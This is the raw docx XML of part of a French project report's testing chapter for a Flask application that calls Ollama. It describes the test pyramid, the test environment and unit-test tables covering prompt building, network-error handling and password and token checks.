            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">vitest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">À chaque</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">push</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tests d'intégration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Routes HTTP de bout en bout, base incluse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pytest</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+ client de test Flask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">À chaque</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">push</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tests fonctionnels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Parcours utilisateur complets, navigateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cahier de tests manuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Avant chaque fin d'itération</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>La base de cette pyramide est la règle d'architecture du § 5.2 :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">aucun import Flask dans</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">services/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. C'est elle qui rend les composants métier testables sans démarrer de serveur ni ouvrir de base. Sans cette séparation, tout test d'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia_service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ou d'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auth_service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deviendrait un test d'intégration, plus lent et plus fragile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trois zones concentrent le risque et reçoivent donc l'essentiel de l'effort : la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">chaîne d'authentification</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(une régression y compromet tous les comptes), le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">contrôle de propriété des ressources</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(une régression y expose les documents d'autrui), et le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">quota IA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(une régression y rend la contrainte du cahier des charges inopérante). À l'inverse, les pages publiques statiques ne sont couvertes que par les tests fonctionnels : le rapport coût/bénéfice d'un test automatisé y est faible.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="121"/>
    <w:bookmarkStart w:id="122" w:name="X8c92310b5a7b6f0936d78582b2fd8ec0ea0516a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Environnement de test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le motif de fabrique</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">create_app()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(§ 6) permet d'instancier une application dédiée aux tests, avec une configuration distincte de celle de production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3562020" cy="2792720"/>
            <wp:docPr id="60" name="Picture 60"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="0a26b8701569-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3562020" cy="2792720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trois choix méritent d'être justifiés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Une base recréée à chaque test.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">create_all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">puis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">drop_all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">autour de chaque cas garantit l'indépendance : un test qui échoue ne fait pas échouer le suivant, et l'ordre d'exécution n'a aucune incidence. Des tests qui ne passent que dans un certain ordre ne prouvent rien.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le limiteur de débit est désactivé.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Flask-Limiter protège les routes d'authentification (§ 6) ; laissé actif, il ferait échouer par</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">429</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">toute série de tests qui se connecte plusieurs fois. Il est donc neutralisé ici, et vérifié par un test dédié qui le réactive explicitement (TS-05 ci-après).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">L'appel au moteur d'inférence n'est jamais réel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dans les tests automatisés :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">call_ollama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est remplacé par un double. Un test qui dépend d'un service externe et d'une inférence de plusieurs secondes n'est ni reproductible ni assez rapide pour tourner à chaque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">push</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="122"/>
    <w:bookmarkStart w:id="127" w:name="Xb22907e3f338e707e101ba51bc0773c599c0db9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tests unitaires des composants métier</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="123" w:name="X6601220644fe5b243f84b2646e09bd917c974a2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ia_service — construction du prompt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La fonction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">build_prompt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>est pure : mêmes entrées, même sortie, aucun effet de bord. C'est le cas le plus simple à couvrir et l'un des plus utiles, puisque le prompt détermine réellement le comportement du modèle (§ 4).</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TU-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">build_prompt("reformuler", "Bonjour")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Le texte est interpolé dans le gabarit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">build_prompt("corriger", txt, "ton formel")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">La consigne particulière est ajoutée en fin de prompt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">build_prompt("traduire", txt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lève</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ValueError</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— action inconnue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Les trois gabarits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Aucun ne mentionne « juridique » (non-régression du § 4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3706773" cy="1288964"/>
            <wp:docPr id="61" name="Picture 61"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="0c250dcbd4af-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3706773" cy="1288964"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Le cas TU-04 est le plus instructif, parce qu'il est né d'une erreur réelle. La dérive du positionnement éditorial décrite en § 4 n'avait été rattrapée que par une relecture ; elle est désormais couverte par un test. Un prompt est du code, il se teste comme du code.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="123"/>
    <w:bookmarkStart w:id="124" w:name="X1f2e9e46ea5c0ab3bfb8fbec5fc373cf2ddb13a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ia_service — traduction des erreurs réseau</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">call_ollama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">doit convertir trois exceptions distinctes de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en une</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RuntimeError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>porteuse d'un message lisible (§ 5.7).</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 simulé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ConnectionError</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">RuntimeError</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">mentionnant l'URL du serveur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>RuntimeError « La connexion à Ollama … n'a pas abouti » — filet de sécurité, plus aucun délai n'est imposé à la lecture (§ 6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTPError</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>RuntimeError portant le code de statut et le message d'erreur lu dans le corps de la réponse d'Ollama</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Réponse nominale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Retourne (texte nettoyé de son bloc de raisonnement, prompt_eval_count + eval_count lus sur la dernière ligne du flux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="124"/>
    <w:bookmarkStart w:id="125" w:name="X4b3b208073ad25aeeabdaaab0a0528fbe59a7f2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>auth_service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TU-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mot de passe correct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vérification bcrypt réussie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mot de passe erroné</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vérification refusée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Deux hachages du même mot de passe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Empreintes différentes (le sel est bien aléatoire)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Access token valide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Décodé,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user_id</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">restitué</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TU-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Access token expiré</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
